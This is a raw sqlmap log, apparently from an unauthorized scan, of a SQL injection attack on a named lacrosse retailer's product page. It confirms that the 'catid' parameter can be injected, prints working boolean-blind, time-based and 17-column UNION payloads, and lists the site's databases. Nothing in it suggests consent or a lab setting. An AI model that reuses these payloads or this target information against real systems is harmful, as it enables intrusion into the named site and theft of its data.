http://www.nicclacrosse.com/products.php?catid=2
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.5.151#dev}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:04:36 /2019-06-01/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[09:04:37] [INFO] testing connection to the target URL
[09:04:38] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:04:38] [INFO] testing if the target URL content is stable
[09:04:38] [INFO] target URL content is stable
[09:04:38] [INFO] testing if GET parameter 'catid' is dynamic
[09:04:39] [INFO] GET parameter 'catid' appears to be dynamic
[09:04:39] [INFO] heuristic (basic) test shows that GET parameter 'catid' might be injectable
[09:04:40] [INFO] testing for SQL injection on GET parameter 'catid'
[09:04:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:04:43] [INFO] GET parameter 'catid' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[09:04:45] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[09:04:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:04:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:04:45] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:04:45] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:04:46] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:04:46] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:04:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:04:46] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:04:46] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:04:47] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:04:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:04:47] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:04:47] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:04:47] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:04:47] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:04:48] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:04:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:04:48] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:04:48] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:04:49] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:04:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:04:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:04:49] [INFO] testing 'MySQL inline queries'
[09:04:49] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[09:04:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[09:04:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[09:04:50] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[09:04:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:04:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:04:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:05:01] [INFO] GET parameter 'catid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[09:05:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:05:01] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:05:01] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:05:02] [INFO] target URL appears to have 17 columns in query
[09:05:03] [INFO] GET parameter 'catid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'catid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 67 HTTP(s) requests:
---
Parameter: catid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: catid=2 AND 3504=3504

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: catid=2 AND (SELECT 1875 FROM (SELECT(SLEEP(5)))YDxI)

    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: catid=2 UNION ALL SELECT CONCAT(0x7176767071,0x5064536a6343427249674f6f66686273637169546e496a546b6c746876456e524e794b6d48554745,0x71716b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JKST
---
[09:05:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[09:05:03] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] nicclacr_lacrosse123

[09:05:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.nicclacrosse.com'

[*] ending @ 09:05:03 /2019-06-01/

